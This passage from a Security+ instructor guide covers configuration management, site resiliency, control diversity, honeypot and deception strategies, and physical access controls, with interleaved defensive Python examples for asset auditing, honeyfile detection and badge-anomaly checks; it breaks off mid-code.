• Live boot media: another option is to use an instance that boots from read-only storage to memory rather than being installed on a local read/write hard disk.

When provisioning a new or replacement instance automatically, the automation system may use one of two types of mastering instructions:
• Master image: this is the "gold" copy of a server instance, with the OS, applications, and patches all installed and configured. This is faster than using a template, but keeping the image up to date can involve more work than updating a template.

• Automated build from a template: similar to a master image, this is the build instructions for an instance. Rather than storing a master image, the software may build and provision an instance according to the template instructions.

Another important process in automating resiliency strategies is to provide configuration validation. This process ensures that a recovery solution is working at each layer (hardware, network connectivity, data replication, and application). An automation solution for incident and disaster recovery will have a dashboard of key indicators and may be able to evaluate metrics such as compliance with RPO and RTO from observed data.


Review Activity:
Backup Strategies
Answer the following questions:

1. What type of scheduled Windows backup job does not clear the archive attribute?

A differential backup. This type of backup selects all new and modified data since the previous full backup. You could also mention copy backups, though these are usually ad hoc rather than scheduled.

2. How does VSS assist a backup solution?

The volume shadow copy service creates snapshots for the backup software to use, avoiding problems with file locks and uncompleted database transactions.

3. True or False: Backup media can be onsite but offline.

True. As a security precaution, backup media can be taken offline at the completion of a job to mitigate the risk of malware corrupting the backup.

4. You are advising a company about backup requirements for a few dozen application servers hosting tens of terabytes of data. The company requires online availability of short-term backups plus offsite security media and long-term archive storage. The company cannot use a cloud solution. What type of on-premises storage solution is best suited to the requirement?

The offsite and archive requirements are best met by a tape solution, but the online requirement may need a RAID array, depending on speed. The requirement is probably not large enough to demand a storage area network (SAN), but could be provisioned as part of one.

5. What is the risk of not following a tested order of restoration when recovering a site from a major incident?

There may be unmet dependencies between systems that are started in the wrong order. This could lead to boot failures and possibly data corruption.


Topic 20C
Implement Cybersecurity Resiliency Strategies

EXAM OBJECTIVES COVERED
2.1 Explain the importance of security concepts in an enterprise environment
2.5 Given a scenario, implement cybersecurity resilience
5.3 Explain the importance of policies to organizational security

Teaching Tip: This topic completes objective 2.5 by covering the diversity content examples, but we also look at configuration and change management, site resiliency, and deception strategies from objectives 2.1 and 5.3.

Effective site management and cybersecurity resilience depend on change control and configuration management. If this crucial documentation is not kept up to date, the response to incident and disaster events will suffer from confusion, errors, and lost time. As part of a cybersecurity program, you must also be able to implement techniques that make things difficult for threat actors. Defense in depth and control diversity are crucial in designing resilient systems. Deception and disruption tactics help to increase the cost of attacks and so deter them.

Show Slide(s): Configuration Management

Configuration Management
Response and recovery controls refer to the whole set of policies, procedures, and resources created for incident and disaster response and recovery. These controls are critical to cybersecurity, but they become increasingly difficult to provision at scale. Effective response and recovery depend heavily on how well organized IT systems are at the site level. Without effective organizational policies to govern change and configuration management, response and recovery is much harder.

Teaching Tip: You don't need to cover this in detail; just stress that the attributes and relationships of assets supporting a workflow must be documented.

Configuration management ensures that each component of ICT infrastructure is in a trusted state that has not diverged from its documented properties. Change control and change management reduce the risk that changes to these components could cause service disruption.
ITIL is a popular documentation of good and best practice activities and processes for delivering IT services. Under ITIL, configuration management is implemented using the following elements:
• Service assets are things, processes, or people that contribute to the delivery of an IT service.

• A Configuration Item (CI) is an asset that requires specific management procedures for it to be used to deliver the service. Each CI must be identified by some sort of label, ideally using a standard naming convention. CIs are defined by their attributes and relationships, which are stored in a configuration management database (CMDB).

• A baseline configuration is the template of settings that a device, VM instance, or other CI was configured to, and that it should continue to match. You might also record performance baselines, such as the throughput achieved by a server, for comparison with monitored levels.

• A configuration management system (CMS) is the tools and databases that collect, store, manage, update, and present information about CIs and their relationships.


A small network might capture this information in spreadsheets and diagrams; there are dedicated applications for enterprise CMS.

• Diagrams are the best way to capture the complex relationships between network elements. Diagrams can be used to show how CIs are involved in business workflows, logical (IP) and physical network topologies, and network rack layouts. Remember, it is not sufficient simply to create the diagram; you must also keep the diagram up to date.

Show Slide(s): Asset Management

Asset Management
An asset management process tracks all the organization's critical systems, components, devices, and other objects of value in an inventory. It also involves collecting and analyzing information about these assets so that personnel can make more informed changes or otherwise work with assets to achieve business goals.

There are many software suites and associated hardware solutions available for tracking and managing assets. An asset management database can be configured to store as much or as little information as is deemed necessary, though typical data would be type, model, serial number, asset ID, location, user(s), value, and service information.

We are focusing on assets that require some degree of configuration (CIs). An organization will also have many assets with no configuration requirement, such as furniture.

Interaction Opportunity: If you do have some extra time, ask students what naming conventions they have encountered. Note the past propensity to use arbitrary, but colorful, server names. Some schemes code location attributes, but they are less relevant to the cloud. Functional names can be tricky if devices subsequently change function. One school of thought is that a single convention that tries to code multiple fields within a single string that will remain consistent over time is an impossible goal, so the ID should just be an arbitrary string, colorful or not, and devices located and selected via attributes and tags, possibly using CNAME and TXT records (see the host naming post at watson-wilson.ca).

Asset Identification and Standard Naming Conventions
Tangible assets can be identified using a barcode label or radio frequency ID (RFID) tag attached to the device (or more simply, using an identification number). An RFID tag is a chip programmed with asset data. When in range of a scanner, the chip activates and signals the scanner. The scanner alerts management software to update the device's location. As well as asset tracking, this allows the management software to track the location of the device, making theft more difficult.

A standard naming convention for hardware assets, and for digital assets such as accounts and virtual machines, makes the environment more consistent. This means that errors are easier to spot and that it is easier to automate through scripting. The naming strategy should allow administrators to identify the type and function of any particular resource or location at any point in the CMDB or network directory. Each label should conform to rules for host and DNS names (see the Microsoft support article "Naming conventions in Active Directory for computers, domains, sites, and OUs" at support.microsoft.com). As well as an ID attribute, the location and function of tangible and digital assets can be recorded using attribute tags and fields or DNS CNAME and TXT resource records.

Internet Protocol (IP) Schema
The division of the IP address space into subnets should be carefully planned and documented in an Internet Protocol (IP) schema. Using a consistent addressing methodology makes it easier to apply firewall access control lists (ACLs) and perform security monitoring (see the Cisco Security Center resource on security IP addressing at tools.cisco.com). It also makes configuration errors less likely and easier to detect. Within each subnet, the schema should identify IP addresses reserved for manual or static allocation versus DHCP address pools. IP address management (IPAM) software suites can be used to monitor IP usage.
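To show how a documented naming convention and IP schema make configuration errors easy to detect, here is an added audit script (not code from the CompTIA guide). The convention (<site>-<function>-<nn>), the two subnets with their static and DHCP ranges, and the sample inventory are all constructed for the example; the host name rule follows the standard DNS label limits.

```python
"""Added example, not from the CompTIA guide: validate host names against a
naming convention and check that each address sits in the documented part of
the IP schema. The convention (<site>-<function>-<nn>), the subnet plan and
the sample inventory are all constructed for illustration."""
import ipaddress
import re

# Constructed IP schema: per subnet, the range reserved for static/manual
# allocation and the range handed out by DHCP.
SCHEMA = {
    "10.1.10.0/24": {"static": ("10.1.10.1", "10.1.10.49"),
                     "dhcp": ("10.1.10.50", "10.1.10.250")},
    "10.1.20.0/24": {"static": ("10.1.20.1", "10.1.20.99"),
                     "dhcp": ("10.1.20.100", "10.1.20.250")},
}
SITES = {"nyc", "lon"}
SERVER_FUNCTIONS = {"fw", "dc", "db", "web"}
# One DNS label: 1-63 characters of letters, digits or hyphen, not starting or
# ending with a hyphen (RFC 1123 host name rules; lowercase enforced here).
LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def check_name(host):
    """Return a list of convention violations (empty when the name is good)."""
    errors = []
    if not LABEL.match(host):
        errors.append("not a valid DNS label")
    parts = host.split("-")
    if len(parts) != 3 or not parts[2].isdigit():
        errors.append("does not follow <site>-<function>-<nn>")
        return errors
    site, function, _ = parts
    if site not in SITES:
        errors.append(f"unknown site code {site!r}")
    if function not in SERVER_FUNCTIONS:
        errors.append(f"unknown function code {function!r}")
    return errors


def classify_address(ip):
    """Say which part of the schema an address falls in: 'static', 'dhcp',
    'unassigned' (planned subnet, but in neither range) or 'outside schema'."""
    addr = ipaddress.ip_address(ip)
    for subnet, ranges in SCHEMA.items():
        if addr in ipaddress.ip_network(subnet):
            for kind, (lo, hi) in ranges.items():
                if ipaddress.ip_address(lo) <= addr <= ipaddress.ip_address(hi):
                    return kind
            return "unassigned"
    return "outside schema"


def audit(inventory):
    """Check (hostname, ip) pairs from an asset inventory: a server named per
    the convention must hold a static address from the documented schema."""
    findings = []
    for host, ip in inventory:
        for err in check_name(host):
            findings.append((host, err))
        placement = classify_address(ip)
        if placement != "static":
            findings.append((host, f"address {ip} is {placement}, not static"))
    return findings


if __name__ == "__main__":
    # Constructed inventory: one good entry, one server in the DHCP pool, one
    # badly named host, and one address outside the documented schema.
    sample = [("nyc-db-01", "10.1.10.3"), ("nyc-web-02", "10.1.10.77"),
              ("LON_FW1", "10.1.20.5"), ("lon-dc-01", "192.168.9.9")]
    for finding in audit(sample):
        print(finding)
```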


Show Slide(s): Change Control and Change Management

Change Control and Change Management
Service management standards distinguish change control as distinct procedures for requesting and approving changes within an overall change management process.

Change Control
A change control process can be used to request and approve changes in a planned and controlled way. Change requests are usually generated when something needs to be corrected, when something changes, or when there is room for improvement in a process or system currently in place. The need to change is often described either as reactive, where the change is forced on the organization, or as proactive, where the need for change is initiated internally. Changes can also be categorized according to their potential impact and level of risk (major, significant, minor, or normal, for instance). In a formal change management process, the need or reasons for change and the procedure for implementing the change is captured in a request for change (RFC) document and submitted for approval.
The RFC will then be considered at the appropriate level and affected stakeholders will be notified. This might be a supervisor or department manager if the change is normal or minor. Major or significant changes might be managed as a separate project and require approval through a change advisory board (CAB).

Change Management
The implementation of changes should be carefully planned, with consideration for how the change will affect dependent components. For most significant or major changes, organizations should attempt to trial the change first. Every change should be accompanied by a rollback (or remediation) plan, so that the change can be reversed if it has harmful or unforeseen consequences. Changes should also be scheduled sensitively if they are likely to cause system downtime or other negative impact on the workflow of the business units that depend on the IT system being modified. Most networks have a scheduled maintenance window period for authorized downtime. When the change has been implemented, its impact should be assessed, and the process reviewed and documented to identify any outcomes that could help future change management projects.

Show Slide(s): Site Resiliency

Site Resiliency
Enterprise-level networks often provision resiliency at the site level. An alternate processing or recovery site is a location that can provide the same or similar level of service. An alternate processing site might always be available and in use, while a recovery site might take longer to set up or only be used in an emergency.

Teaching Tip: You might want to note hot/hot terminology to distinguish the site and replication method. Hot/hot refers to synchronous replication between the live site and the failover, so that there is no delay. Hot/cold refers to a processing facility that is fully operational, but where data must be restored manually from a backup.

Operations are designed to failover to the new site until the previous site can be brought back online. Failover is a technique that ensures a redundant component, device, application, or site can quickly and efficiently take over the functionality of an asset that has failed. For example, load balancers provide failover in the event that one or more servers or sites behind the load balancer are down or are taking too long to respond. Once the load balancer detects this, it will redirect inbound traffic to an alternate processing server or site. Thus, redundant servers in the load balancer pool ensure there is no or minimal interruption of service.
Site resiliency is described as hot, warm, or cold:
• A hot site can failover almost immediately. It generally means that the site is already within the organization's ownership and is ready to deploy. For example, a hot site could consist of a building with operational computer equipment that is kept updated with a live data set.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 533

• A warm site could be similar, but with the requirement that the latest data set will
need to be loaded.

• A cold site takes longer to set up. A cold site may be an empty building with a lease
agreement in place to install whatever equipment is required when necessary.

Clearly, providing redundancy on this scale can be very expensive. Sites are often
leased from service providers. However, in the event of a nationwide emergency,
demand for the services is likely to exceed supply. Another option is for businesses to
enter into reciprocal arrangements to provide mutual support. This is cost effective but
complex to plan and set up.
Another issue is that creating a duplicate of anything doubles the complexity of
securing that resource properly. The same security procedures must apply to
redundant sites, spare systems, and backup data as apply to the main copy.
For many companies, the most cost effective solution is to move processing and data
storage to the cloud.

Show Slide(s): Diversity and Defense in Depth

Diversity and Defense in Depth
Layered security is typically seen as improving cybersecurity resiliency because
it provides defense in depth. The idea is that to fully compromise a system, the
attacker must get past multiple security controls, providing control diversity. These
layers reduce the potential attack surface and make it much more likely that an attack
will be deterred or prevented, or at least detected and then prevented by manual
intervention.

Technology and Control Diversity
Allied with defense in depth is the concept of security through (or with) diversity.
Technology diversity refers to environments that are a mix of operating systems,
applications, coding languages, virtualization solutions, and so on. Control diversity
means that the layers of controls should combine different classes of technical and
administrative controls with the range of control functions: prevent, detect, correct,
and deter.
Consider the scenario where Alan from marketing is sent a USB stick containing
designs for a new billboard campaign from an agency. Without defense in depth, Alan
might find the USB stick on his desk in the morning, plug it into his laptop without
much thought, and from that point is potentially vulnerable to compromise. There are
many opportunities in this scenario for an attacker to tamper with the media at the
agency, in the post, or at Alan's desk.
Defense in depth, established by deploying a diverse range of security controls, could
mitigate the numerous risks inherent in this scenario:

• User training (administrative control) could ensure that the media is not left
unattended on a desk and is not inserted into a computer system without scanning
it first.

• Endpoint security (technical control) on the laptop could scan the media for
malware or block access automatically.

• Security locks inserted into ports (physical control) on the laptop could prevent
attachment of media without requesting a key, allowing authorization checks to be
performed first.

• Permissions restricting Alan's user account (technical control) could prevent the
malware from executing successfully.

• The use of encrypted and digitally signed media (technical control) could prevent or
identify an attempt to tamper with it.

• If the laptop were compromised, intrusion detection and logging/alerting systems
(technical control) could detect and prevent the malware spreading on the network.

Vendor Diversity
As well as deploying multiple types of controls, you should consider the advantages
of leveraging vendor diversity. Vendor diversity means that security controls are
sourced from multiple suppliers. A single vendor solution is a tempting choice for many
organizations, as it provides interoperability and can reduce training and support costs.
Some disadvantages could include the following:

• Not obtaining best-in-class performance—one vendor might provide an effective
firewall solution, but the bundled malware scanning is found to be less effective.

• Less complex attack surface—a single vulnerability in a supplier's code could put
multiple appliances at risk in a single vendor solution. A threat actor will be able to
identify controls and possible weaknesses more easily.

• Less innovation—dependence on a single vendor might make the organization
invest too much trust in that vendor's solutions and less willing to research and test
new approaches.

Crypto Diversity
This concept can be extended to the selection of algorithms and implementations
of cryptography. Adoption of methods such as blockchain-based IAM (ibm.com/blogs/
blockchain, "Decentralized identity: an alternative to password-based authentication")
or selecting ChaCha in place of AES as a preferred cipher suite (blog.cloudflare.com,
"It takes two to ChaCha (Poly)") forces threat actors to develop new attack methods.

Show Slide(s): Deception and Disruption Strategies

Deception and Disruption Strategies
The practice of cybersecurity is often described as asymmetric warfare; the defenders
have to win every encounter and be ready all the time. The threat actors can choose
when to attack and only have to win once. Some cybersecurity tactics aim to reduce
that asymmetry by increasing the attack cost. This means that a threat actor has to
commit more resources to even plan an attack.
Active defense means an engagement with the adversary, but this can be interpreted
in several different ways. One type of active defense involves the deployment of decoy
assets to act as lures or bait. It is much easier to detect intrusions when an attacker
interacts with a decoy resource, because you can precisely control baseline traffic and
normal behavior in a way that is more difficult to do for production assets.

Honeypots, Honeynets, and Honeyfiles
A honeypot is a computer system set up to attract threat actors, with the intention
of analyzing attack strategies and tools, to provide early warnings of attack attempts,
or possibly as a decoy to divert attention from actual computer systems. Another use
is to detect internal fraud, snooping, and malpractice. A honeynet is an entire decoy
network. This may be set up as an actual network or simulated using an emulator.
Deploying a honeypot or honeynet can help an organization to improve its security
systems, but there is the risk that the attacker can still learn a great deal about
how the network is configured and protected from analyzing the honeypot system.
Many honeypots are set up by security researchers investigating malware threats,
software exploits, and spammers' abuse of open relay mail systems. These systems
are generally fully exposed to the Internet. On a production network, a honeypot is
more likely to be located in a DMZ, or on an isolated segment on the private network
(if the honeypot is seeking to draw out insider threats). This provides early warning
and evidence of whether an attacker has been able to penetrate to a given security
zone. This can help the security team find the source of the attack and take more
comprehensive steps to completely eradicate the threat from the organization.
A honeypot or honeynet can be combined with the concept of a honeyfile, which is
convincingly useful, but actually fake, data. This honeyfile can be made trackable, so
that when a threat actor successfully exfiltrates it, the attempts to reuse or exploit it
can be traced.
For example, an organization constructs a database full of benign or meaningless
data disguised as important financial records. This deception strategy might involve
breadcrumbs inserted into the production environment to subtly guide a threat actor
toward the spoofed loot (fidelissecurity.com/threatgeek, "Deception: breadcrumbs and
intelligent deception"). The database is placed behind a subnet with lowered defenses,
which baits an attacker into trying to exfiltrate this useless data. Identifying the attacker
also allows an organization to pursue an attribution strategy. Attribution means the
organization publicizes the attacker's role and publishes the methods used as threat
intelligence.

Disruption Strategies
Another type of active defense uses disruption strategies. These adopt some of the
obfuscation strategies used by malicious actors. The aim is to raise the attack cost and
tie up the adversary's resources. Some examples of disruption strategies include:

• Using bogus DNS entries to list multiple hosts that do not exist.

• Configuring a web server with multiple decoy directories or dynamically generated
pages to slow down scanning.

• Using port triggering or spoofing to return fake telemetry data when a host detects
port scanning activity. This will result in multiple ports being falsely reported as
open and will slow down the scan. Telemetry can refer to any type of measurement
or data returned by remote scanning. Similar fake telemetry could be used to report
IP addresses as up when they are not, for instance.

• Using a DNS sinkhole to route suspect traffic to a different network, such as a
honeynet, where it can be analyzed.
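The detection side of the honeyfile and decoy-directory ideas above, as an added example that is not code from the CompTIA guide: because legitimate users never request a decoy directory or download a honeyfile, the expected baseline is zero hits, so any match in the web server's access log is a high-confidence indicator. The decoy paths, honeyfile names and the access-log lines are all constructed for this example.

```python
"""Alert on any interaction with decoy web directories or honeyfiles.

Added example, not code from the CompTIA guide. Legitimate users never
request a decoy directory or download a honeyfile, so the expected baseline
is zero hits and every match is a high-confidence indicator. The decoy
inventory and the access-log lines below are constructed for this example.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed decoy inventory: directories exposed only as bait for scanners,
# plus honeyfiles whose names look like valuable (but fake) financial data.
DECOY_DIRS = ("/backup/", "/admin-old/", "/finance/exports/")
HONEYFILES = {"/finance/exports/q4_payroll.xlsx", "/backup/db_dump.sql"}

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class Alert:
    source_ip: str
    severity: str                 # "high" = honeyfile served, "medium" = decoy browsing
    paths: List[str] = field(default_factory=list)


def classify(path: str) -> Optional[str]:
    """Return "high" for a honeyfile, "medium" for a decoy directory, else None."""
    bare = path.split("?", 1)[0]          # ignore query strings such as ?download=1
    if bare in HONEYFILES:
        return "high"
    if bare.startswith(DECOY_DIRS):
        return "medium"
    return None


def detect(log_lines) -> List[Alert]:
    """Return one Alert per source IP that touched a decoy, sorted by IP.

    A honeyfile request counts as exfiltration ("high") only when the server
    actually returned it (2xx); a 404 on a honeyfile path is still reconnaissance
    and keeps the alert at "medium".
    """
    alerts: Dict[str, Alert] = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # malformed line; a real pipeline would count these
        severity = classify(m["path"])
        if severity is None:
            continue
        if severity == "high" and not m["status"].startswith("2"):
            severity = "medium"
        alert = alerts.setdefault(m["ip"], Alert(m["ip"], "medium"))
        alert.paths.append(m["path"])
        if severity == "high":
            alert.severity = "high"
    return sorted(alerts.values(), key=lambda a: a.source_ip)


# Constructed sample: one legitimate client and two scanners.
SAMPLE_LOG = [
    '203.0.113.10 - - [30/Aug/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.10 - - [30/Aug/2021:10:01:05 +0000] "GET /finance/ HTTP/1.1" 200 2048',
    '198.51.100.7 - - [30/Aug/2021:10:02:11 +0000] "GET /admin-old/ HTTP/1.1" 200 300',
    '198.51.100.7 - - [30/Aug/2021:10:02:12 +0000] "GET /backup/ HTTP/1.1" 200 410',
    '198.51.100.7 - - [30/Aug/2021:10:02:15 +0000] '
    '"GET /finance/exports/q4_payroll.xlsx?download=1 HTTP/1.1" 200 88230',
    '192.0.2.44 - - [30/Aug/2021:10:05:00 +0000] "GET /backup/db_dump.sql HTTP/1.1" 404 162',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a.severity.upper():6} {a.source_ip} touched {len(a.paths)} decoy path(s): {a.paths}")
```

The legitimate client browsing /finance/ produces nothing, while the scanner that pulled the honeyfile is escalated to high severity and the 404 on a honeyfile path stays a medium-severity reconnaissance alert.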

Review Activity:
Cybersecurity Resiliency Strategies
Answer the following questions:

1. You are preparing a white paper on configuration management essentials
for your customers. You have the following headings already: Diagrams,
Standard naming conventions, Internet protocol (IP) schema. If you are
basing your paper on the CompTIA Security+ objectives, which other topic
should you cover?

The configuration baseline is an essential concept as it allows unauthorized change to
be detected more easily and planned change to be managed more easily.

2. What are the risks of not having a documented IP schema?

Configuration errors are more likely, especially where complex access control lists
(ACLs) and security monitoring sensor deployment is required.

3. In organizational policies, what two concepts govern change?

A change control process governs the way changes are requested and approved. A
change management process governs the way that planned change is implemented
and the way unplanned change is handled.

4. Which terms are used to discuss levels of site resiliency?

Hot, warm, and cold sites, referring to the speed with which a site can failover.

5. You are preparing some briefing notes on diversity strategies for
cybersecurity resilience for the executive team. You have prepared sections
on Technologies, Crypto, and Controls so far. What other topic do you need
to cover?

Vendor diversity.

6. How could a deception-based cybersecurity resilience strategy return fake
telemetry to a threat actor?

Fake telemetry means that when a threat actor runs port or host discovery scans, a
spoof response is returned. This could lead the threat actor to waste time probing the
port or host IP address trying to develop an attack vector that does not actually exist.

Lesson 20
Summary
You should be able to use redundancy, backup, configuration change management,
diversity, and deception to improve cybersecurity resilience.

Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, revisit any content examples that they have questions
about. If you have used all the available time for this lesson block, note the issues,
and schedule time for a review later in the course.

Interaction Opportunity: Optionally, ask students whether they have witnessed any
restore from backup events that went either disastrously or very well.

Guidelines for Implementing Cybersecurity Resilience
Follow these guidelines for implementing cybersecurity resilience:

• Set up a configuration management system and ensure that it is kept up to date:

  • An inventory to track assets, using standard naming convention and labelling.

  • Baseline configuration information for each configuration item.

  • Diagrams showing relationships between assets in workflows and networks.

• Ensure that changes to workflows and assets are governed by change control and
change management processes.

• Develop a backup strategy and ensure that the order of restoration is fully tested:

  • Determine and recovery windows for different data assets.

  • Separate data from compute functions to ensure nonpersistence during recovery.

  • Select media that meets storage and onsite/offsite plus online/offline storage
  requirements (disk, tape, NAS, and SAN).

  • Implement a full/incremental/differential scheme to accommodate media
  storage limitations.

• Using risk assessments, identify assets that have high availability requirements and
provision redundancy to meet this requirement:

  • Hot, warm, or cold site resource to recover from disasters.

  • Dual power supply, PDUs, UPSs, and generators to make power system resilient.

  • NIC teaming, multiple paths, and load balancing to make networks resilient.

  • RAID and multipath I/O to make storage resilient.

• Use risk assessments and impact analysis to identify whether technology, control,
vendor, or crypto diversity could be increased to benefit resiliency.

• Use threat awareness and risk assessment to determine whether deception and
active defense strategies, such as decoy honeypot assets and fake telemetry, could
benefit resiliency.

Lesson 21
Explaining Physical Security

LESSON INTRODUCTION
Risks from intrusion by social engineering, wireless backdoors, and data exfiltration by
mobile devices all mean that physical security is a critical consideration for site design
and operations. The premises in which networks are installed need to use access
control mechanisms and be resilient to person-made and natural disasters, such
as fire.

Teaching Tip: As well as site perimeter security, this topic looks at the security of
hardware cabling and environmental monitoring. This material should be quite
straightforward and you should hopefully not need to allocate too much class time to
covering it.

Lesson Objectives
In this lesson, you will:

• Explain the importance of physical site security controls.

• Explain the importance of physical host security controls.

Topic 21A
Explain the Importance of Physical
Site Security Controls

EXAM OBJECTIVES COVERED
1.2 Given a scenario, analyze potential indicators to determine the type of attack
2.7 Explain the importance of physical security controls

Teaching Tip: As well as starting coverage of objective 2.7, this topic includes card
cloning and skimming attacks from 1.2.

If an attacker can gain physical access to your premises, there may be lots of
opportunities to install rogue devices, vandalize or disrupt systems, or observe
confidential information. Consequently, as a security professional, you should be able
to explain the importance of installing access and monitoring controls that protect sites
against physical intrusion.

Show Slide(s): Physical Security Controls

Physical Security Controls
Physical access controls are security measures that restrict and monitor access to
specific physical areas or assets. They can control access to a building, to equipment,
or to specific areas, such as server rooms, finance or legal areas, data centers, network
cable runs, or any other area that has hardware or information that is considered
to have important value and sensitivity. Determining where to use physical access
controls requires a cost-benefit analysis and must consider any regulations or other
compliance requirements for the specific types of data that are being safeguarded.

Teaching Tip: Recall that deterrence, delay, and detection are often more realistic
security goals than prevention.

Physical access controls depend on the same access control fundamentals as network
or operating system security:

• Authentication—create access lists and identification mechanisms to allow
approved persons through the barriers.

• Authorization—create barriers around a resource so that access can be controlled
through defined entry and exit points.

• Accounting—keep a record of when entry/exit points are used and detect security
breaches.

Physical security can be thought of in terms of zones. Each zone should be separated
by its own barrier(s). Entry and exit points through the barriers need to be controlled
by one or more security mechanisms. Progression through each zone should be
progressively more restricted.

Show Slide(s): Site Layout, Fencing, and Lighting

Site Layout, Fencing, and Lighting

Teaching Tip: Make sure students are familiar with the different types of physical
access controls—barriers, gateways, locks, alarms, and surveillance.

In existing premises, there will not be much scope to influence site layout. However,
given constraints of cost and existing infrastructure, try to plan the site using the
following principles:

• Locate secure zones, such as equipment rooms, as deep within the building as
possible, avoiding external walls, doors, and windows.

• Use a demilitarized zone (DMZ) design for the physical space. Position public access
areas so that guests do not pass near secure zones. Security mechanisms in public
areas should be highly visible, to increase deterrence.

• Use signage and warnings to enforce the idea that security is tightly controlled.
Beyond basic no trespassing signs, some homes and offices also display signs from
the security companies whose services they are currently using. These may convince
intruders to stay away.

• Conversely, entry points to secure zones should be discreet. Do not allow an
intruder the opportunity to inspect security mechanisms protecting such zones (or
even to know where they are). Use industrial camouflage to make buildings and
gateways protecting high-value assets unobtrusive, or create high-visibility decoy
areas to draw out potential threat actors.

• Try to minimize traffic having to pass between zones. The flow of people should be
"in and out" rather than "across and between."

• Give high traffic public areas high visibility, so that covert use of gateways, network
access ports, and computer equipment is hindered, and surveillance is simplified.

• In secure zones, do not position display screens or input devices facing toward
pathways or windows. Alternatively, use one-way glass so that no one can look in
through windows.

Barricades and Entry/Exit Points
A barricade is something that prevents access. As with any security system, no
barricade is completely effective; a wall may be climbed or a lock may be picked, for
instance. The purpose of barricades is to channel people through defined entry and
exit points. Each entry point should have an authentication mechanism so that only
authorized persons are allowed through. Effective surveillance mechanisms ensure
that attempts to penetrate a barricade by other means are detected.

Sites where there is a risk of a terrorist attack will use barricades such as bollards and
security posts to prevent vehicles from approaching closely to a building at high speed.

Fencing
The exterior of a building may be protected by fencing. Security fencing needs to be
transparent (so that guards can see any attempt to penetrate it), robust (so that it is
difficult to cut), and secure against climbing (which is generally achieved by making it tall
and possibly by using razor wire). Fencing is generally effective, but the drawback is that
it gives a building an intimidating appearance. Buildings that are used by companies to
welcome customers or the public may use more discreet security methods.

Lighting
Security lighting is enormously important in contributing to the perception that a
building is safe and secure at night. Well-designed lighting helps to make people feel
safe, especially in public areas or enclosed spaces, such as parking garages. Security
lighting also acts as a deterrent by making intrusion more difficult and surveillance
(whether by camera or guard) easier. The lighting design needs to account for overall
light levels, the lighting of particular surfaces or areas (allowing cameras to perform
facial recognition, for instance), and avoiding areas of shadow and glare.

Show Slide(s): Gateways and Locks

Gateways and Locks
In order to secure a gateway, it must be fitted with a lock. A secure gateway will
normally be self-closing and self-locking, rather than depending on the user to close
and lock it. Lock types can be categorized as follows:

• Physical—a conventional lock prevents the door handle from being operated
without the use of a key. More expensive types offer greater resistance against lock
picking.

• Electronic—rather than a key, the lock is operated by entering a PIN on an electronic
keypad. This type of lock is also referred to as cipher, combination, or keyless. A
smart lock may be opened using a magnetic swipe card or feature a proximity
reader to detect the presence of a physical token, such as a wireless key fob or
smart card.

Generic examples of locks—From left to right, a standard key lock, a deadbolt lock, and an electronic
keypad lock. (Images from user macrovector, 123rf.com.)

• Biometric—a lock may be integrated with a biometric scanner.

Generic examples of a biometric thumbprint scanner lock and a token-based key card lock.
(Images from user macrovector, 123rf.com.)

Mantraps
Apart from being vulnerable to lock picking, the main problem with a simple door or
gate as an entry mechanism is that it cannot accurately record who has entered or left
an area. Multiple people may pass through the gateway at the same time; a user may
hold a door open for the next person; an unauthorized user may tailgate behind an
authorized user. This risk may be mitigated by installing a turnstile (a type of gateway
that only allows one person through at a time). The other option is to add some sort of
surveillance on the gateway. Where security is critical and cost is no object, an access
control vestibule, or mantrap, could be employed. A mantrap is where one gateway
leads to an enclosed space protected by another barrier.

Cable Locks
Cable locks attach to a secure point on the device chassis. A server chassis might come
with both a metal loop and a Kensington security slot. As well as securing the chassis
to a rack or desk, the position of the secure point prevents the chassis from being
opened, without removing the cable first.

Show Slide(s): Physical Attacks against Smart Cards and USB

Physical Attacks against Smart Cards and USB
Some types of smart cards used as passkeys for electronic locks can be vulnerable to
cloning and skimming attacks:

• Card cloning—this refers to making one or more copies of an existing card. A
lost or stolen card with no cryptographic protections can be physically duplicated.
Card loss should be reported immediately so that it can be revoked and a new one
issued. If there were a successful attack, it might be indicated by use of a card in a
suspicious location or time of day.

• Skimming—this refers to using a counterfeit card reader to capture card details,
which are then used to program a duplicate. Some types of proximity card can quite
easily be made to transmit the credential to a portable RFID reader that a threat
actor could conceal on his or her person. Skimmers installed on public readers, such
as ATM machines, can be difficult to spot.

These attacks can generally only target "dumb" smart cards that transfer tokens rather
than perform cryptoprocessing. Bank-issued smart cards, referred to as EMV (Electron,
MasterCard, Visa), can also be vulnerable through the magnetic strip, which is retained
for compatibility.
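The accounting side of the indicators just described, as an added example that is not code from the CompTIA guide: each badge event is checked against the holder's authorized zones and hours, and "suspicious location" is generalized to the same card presenting at two sites faster than anyone could travel between them, which only a duplicate card can do. The cards, readers, sites, travel times and events are all constructed for this example.

```python
"""Flag badge events that point to a cloned, stolen, or misused access card.

Added example, not code from the CompTIA guide. The guide notes that a
successful card-cloning attack may show up as use of a card in a suspicious
location or at a suspicious time of day. This checks each badge event against
the holder's authorized zones and hours, and generalizes "suspicious location"
to the same card appearing at two sites faster than anyone could travel
between them. Cards, readers, sites, travel times, and events are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, time, timedelta
from typing import Dict, FrozenSet, List, Tuple


@dataclass(frozen=True)
class CardPolicy:
    holder: str
    zones: FrozenSet[str]     # zones this card may open
    start: time               # permitted access window (local time)
    end: time


# Constructed card inventory.
POLICIES: Dict[str, CardPolicy] = {
    "C-1001": CardPolicy("alice", frozenset({"lobby", "office", "server-room"}),
                         time(7, 0), time(20, 0)),
    "C-1002": CardPolicy("bob", frozenset({"lobby", "office"}), time(8, 0), time(18, 0)),
}

# Constructed reader inventory: which zone each reader guards and which site it is in.
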